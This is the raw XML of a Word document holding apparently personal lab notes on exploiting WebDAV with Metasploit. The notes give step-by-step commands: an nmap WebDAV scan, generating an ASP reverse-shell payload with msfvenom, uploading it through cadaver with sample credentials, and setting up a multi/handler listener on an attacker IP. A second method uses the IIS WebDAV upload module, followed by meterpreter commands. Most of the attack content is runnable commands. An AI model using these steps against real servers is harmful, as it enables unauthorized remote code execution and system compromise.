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56BD" w14:textId="09593644" w:rsidR="00853ABF" w:rsidRDefault="008A164D">
      <w:r w:rsidRPr="008A164D">
        <w:t xml:space="preserve">Exploiting WebDAV </w:t>
      </w:r>
      <w:r w:rsidR="00131484" w:rsidRPr="008A164D">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="008A164D">
        <w:t xml:space="preserve"> Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52585BED" w14:textId="1F6A2BE9" w:rsidR="008A164D" w:rsidRDefault="00131484">
      <w:r>
        <w:t>2 techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E44D5" w14:textId="77777777" w:rsidR="00131484" w:rsidRDefault="00131484"/>
    <w:p w14:paraId="2F6C88D6" w14:textId="77777777" w:rsidR="004E1A9A" w:rsidRDefault="004E1A9A"/>
    <w:p w14:paraId="769133DB" w14:textId="48BEC884" w:rsidR="004E1A9A" w:rsidRPr="004E1A9A" w:rsidRDefault="004E1A9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1A9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">First </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1A9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7965D1DE" w14:textId="5F4F94D9" w:rsidR="00131484" w:rsidRPr="00131484" w:rsidRDefault="00131484">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00131484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5BF68" w14:textId="0A5E89C8" w:rsidR="00131484" w:rsidRDefault="00131484">
      <w:r>
        <w:t>Nmap -s V -p 80 –script=http-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ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7872B4C0" w14:textId="76A0DE6C" w:rsidR="00131484" w:rsidRPr="00482E0F" w:rsidRDefault="00131484">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C990D" w14:textId="7AA03011" w:rsidR="00131484" w:rsidRDefault="00131484">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1740C3B3" w14:textId="5A84DA7D" w:rsidR="00131484" w:rsidRDefault="00482E0F">
      <w:r>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11358723" w14:textId="0177612D" w:rsidR="00482E0F" w:rsidRDefault="00482E0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generating the asp payload ourselves my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00482E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00482E0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A7AD0" w14:textId="1A275048" w:rsidR="00482E0F" w:rsidRDefault="00482E0F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p /windows/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT=1234 -f asp &gt; shell.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED91439" w14:textId="77777777" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B"/>
    <w:p w14:paraId="353EE831" w14:textId="2F362396" w:rsidR="00BF3D0B" w:rsidRPr="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3D0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ote:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0F3A9" w14:textId="5FAA5E83" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:r>
        <w:t xml:space="preserve">it recommended to use 32bit architecture if you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> now the architecture of the system, it will work both on the 32 or 64bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446DE1CA" w14:textId="77777777" w:rsidR="003E3CFB" w:rsidRDefault="003E3CFB"/>
    <w:p w14:paraId="4EE5842A" w14:textId="467BCFEF" w:rsidR="00BF3D0B" w:rsidRPr="003E3CFB" w:rsidRDefault="003E3CFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cadaver</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF26E35" w14:textId="77777777" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:r>
        <w:t>Cadaver http://ip_address/webda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0899E" w14:textId="3858A80C" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:r>
        <w:t>Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250AD393" w14:textId="51A41B30" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:r>
        <w:t>Password_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D34129" w14:textId="66790A17" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDA2B5" w14:textId="0D689835" w:rsidR="00BF3D0B" w:rsidRDefault="00CB68C6">
      <w:r>
        <w:t>Put /root/sheel.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515B48F" w14:textId="77777777" w:rsidR="003E3CFB" w:rsidRDefault="003E3CFB"/>
    <w:p w14:paraId="292F856B" w14:textId="450A41E8" w:rsidR="00CB68C6" w:rsidRPr="003E3CFB" w:rsidRDefault="003E3CFB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3CFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7FCE3" w14:textId="2B65F3F2" w:rsidR="00BF3D0B" w:rsidRDefault="003E3CFB">
      <w:r>
        <w:t>Click the uploaded file before it setup the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E8E0F" w14:textId="77777777" w:rsidR="003E3CFB" w:rsidRDefault="003E3CFB"/>
    <w:p w14:paraId="69A85E75" w14:textId="04364DDB" w:rsidR="003E3CFB" w:rsidRPr="00295B54" w:rsidRDefault="00295B54">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295B54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="003E3CFB" w:rsidRPr="00295B54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CC417" w14:textId="2FD51797" w:rsidR="003E3CFB" w:rsidRDefault="00295B54">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="003E3CFB">
        <w:t>erv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ice </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DCF2F5" w14:textId="531106F7" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274CAC8A" w14:textId="1B8FC88C" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D06AE" w14:textId="53413A87" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t># for handling the malicious payload listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F28C5" w14:textId="324BA66F" w:rsidR="00295B54" w:rsidRDefault="00295B54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1957371" w14:textId="772098F3" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t xml:space="preserve"># same as the payload that we generated with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5386EFE1" w14:textId="7EAAE416" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AEE591" w14:textId="32405C82" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ECF3B9F" w14:textId="2FAED7D0" w:rsidR="00295B54" w:rsidRDefault="00295B54">
      <w:r>
        <w:t>Set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD0D93" w14:textId="554853A8" w:rsidR="00295B54" w:rsidRDefault="00B04606">
      <w:r>
        <w:t xml:space="preserve">#must me same with the payload generated by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68BE29F8" w14:textId="14E411B6" w:rsidR="00B04606" w:rsidRDefault="00B04606">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F401B40" w14:textId="77777777" w:rsidR="00B04606" w:rsidRDefault="00B04606"/>
    <w:p w14:paraId="0B18EED2" w14:textId="1393ADDC" w:rsidR="00B04606" w:rsidRPr="00B04606" w:rsidRDefault="00B04606">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04606">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A47B88" w14:textId="7694FD87" w:rsidR="00B04606" w:rsidRDefault="00B04606">
      <w:r>
        <w:t>Click on the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9DC573" w14:textId="77777777" w:rsidR="00B04606" w:rsidRDefault="00B04606"/>
    <w:p w14:paraId="42D42952" w14:textId="44235833" w:rsidR="00B04606" w:rsidRDefault="00B04606">
      <w:r>
        <w:t>Then gain access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE34B2" w14:textId="6D929B67" w:rsidR="00B04606" w:rsidRDefault="004E1A9A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysnifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="736AA548" w14:textId="56626AAF" w:rsidR="004E1A9A" w:rsidRDefault="004E1A9A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getguid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="041BF805" w14:textId="77777777" w:rsidR="004E1A9A" w:rsidRDefault="004E1A9A"/>
    <w:p w14:paraId="21D80746" w14:textId="77777777" w:rsidR="00D47BF3" w:rsidRDefault="00D47BF3"/>
    <w:p w14:paraId="2F585972" w14:textId="2D23216C" w:rsidR="00D47BF3" w:rsidRDefault="00D47BF3" w:rsidP="00D47BF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Second</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1A9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C907F7F" w14:textId="5EA18591" w:rsidR="00D47BF3" w:rsidRDefault="00D47BF3" w:rsidP="00D47BF3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01AF8A6" w14:textId="17C285B7" w:rsidR="00D47BF3" w:rsidRPr="00D47BF3" w:rsidRDefault="00D47BF3" w:rsidP="00D47BF3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55857FAF" w14:textId="1745E2F7" w:rsidR="00D47BF3" w:rsidRDefault="00D47BF3" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE7C23" w14:textId="680C4593" w:rsidR="00D47BF3" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use (num/name) # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis_webdav_upload_asp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61339540" w14:textId="569FCD4F" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76947DCC" w14:textId="41D9C518" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpUsernames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57856A56" w14:textId="72CD00C8" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11070268" w14:textId="4500166D" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Set LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C72D7" w14:textId="4AA8DD89" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Set LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58204279" w14:textId="0EC8A33D" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve"># where comes the authentication we have to provide the values of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usrrnamne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875D98C" w14:textId="0006CF3A" w:rsidR="003958CF" w:rsidRDefault="00C960FD" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D6BD635" w14:textId="2F664756" w:rsidR="00C960FD" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve"># of the server is using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then we have to change it to true and also port to 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ECBDB5" w14:textId="15B35F09" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Set PATH /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/Metasploit.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30871DDB" w14:textId="14A0B0B6" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771DE244" w14:textId="588ECAA3" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="2C78CC32" w14:textId="4E409C95" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CFD5E" w14:textId="59954F66" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Systinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25603416" w14:textId="16562B36" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FB16641" w14:textId="77777777" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="61B8AD72" w14:textId="77777777" w:rsidR="00F806D7" w:rsidRDefault="00F806D7" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="0F1D09C4" w14:textId="28C4891C" w:rsidR="00F806D7" w:rsidRPr="00F806D7" w:rsidRDefault="00F806D7" w:rsidP="00D47BF3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F806D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EA654" w14:textId="03BD8A21" w:rsidR="00F806D7" w:rsidRDefault="00F806D7" w:rsidP="00D47BF3">
      <w:r>
        <w:t xml:space="preserve">Cadaver also help to delete the file by using the command in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154AD72" w14:textId="77812D1D" w:rsidR="00F806D7" w:rsidRDefault="00F806D7" w:rsidP="00D47BF3">
      <w:r>
        <w:t>Delete filename.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576DC16" w14:textId="4DA7AA27" w:rsidR="00F806D7" w:rsidRDefault="00CF2CDE" w:rsidP="00D47BF3">
      <w:r>
        <w:t>It is recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD0750" w14:textId="77777777" w:rsidR="00CF2CDE" w:rsidRPr="009C05C1" w:rsidRDefault="00CF2CDE" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="761F7718" w14:textId="77777777" w:rsidR="009C05C1" w:rsidRDefault="009C05C1" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="1782D32F" w14:textId="77777777" w:rsidR="003958CF" w:rsidRDefault="003958CF" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="41EDED6D" w14:textId="77777777" w:rsidR="003958CF" w:rsidRPr="00D47BF3" w:rsidRDefault="003958CF" w:rsidP="00D47BF3"/>
    <w:p w14:paraId="304A5980" w14:textId="77777777" w:rsidR="00D47BF3" w:rsidRDefault="00D47BF3"/>
    <w:p w14:paraId="4F0983C9" w14:textId="48B5F1A5" w:rsidR="00B04606" w:rsidRDefault="00B04606"/>
    <w:p w14:paraId="4E93F913" w14:textId="77777777" w:rsidR="00295B54" w:rsidRDefault="00295B54"/>
    <w:p w14:paraId="3FA8566E" w14:textId="77777777" w:rsidR="00295B54" w:rsidRDefault="00295B54"/>
    <w:p w14:paraId="171EAD74" w14:textId="77777777" w:rsidR="00BF3D0B" w:rsidRDefault="00BF3D0B"/>
    <w:p w14:paraId="2F3A653D" w14:textId="77777777" w:rsidR="00482E0F" w:rsidRDefault="00482E0F"/>
    <w:p w14:paraId="40EC32E6" w14:textId="77777777" w:rsidR="00482E0F" w:rsidRPr="00482E0F" w:rsidRDefault="00482E0F"/>
    <w:p w14:paraId="4FE574FB" w14:textId="77777777" w:rsidR="00482E0F" w:rsidRDefault="00482E0F"/>
    <w:sectPr w:rsidR="0048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B1"/>
    <w:rsid w:val="00131484"/>
    <w:rsid w:val="00295B54"/>
    <w:rsid w:val="003958CF"/>
    <w:rsid w:val="003E3CFB"/>
    <w:rsid w:val="00482E0F"/>
    <w:rsid w:val="004E1A9A"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00702E93"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008A164D"/>
    <w:rsid w:val="00933CB1"/>
    <w:rsid w:val="009C05C1"/>
    <w:rsid w:val="00B04606"/>
    <w:rsid w:val="00BF3D0B"/>
    <w:rsid w:val="00C960FD"/>
    <w:rsid w:val="00CB68C6"/>
    <w:rsid w:val="00CF2CDE"/>
    <w:rsid w:val="00D47BF3"/>
    <w:rsid w:val="00F8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2D5C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2285C957-13E3-4DDE-A3F1-594A7E64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2025-08-26T06:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-26T07:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>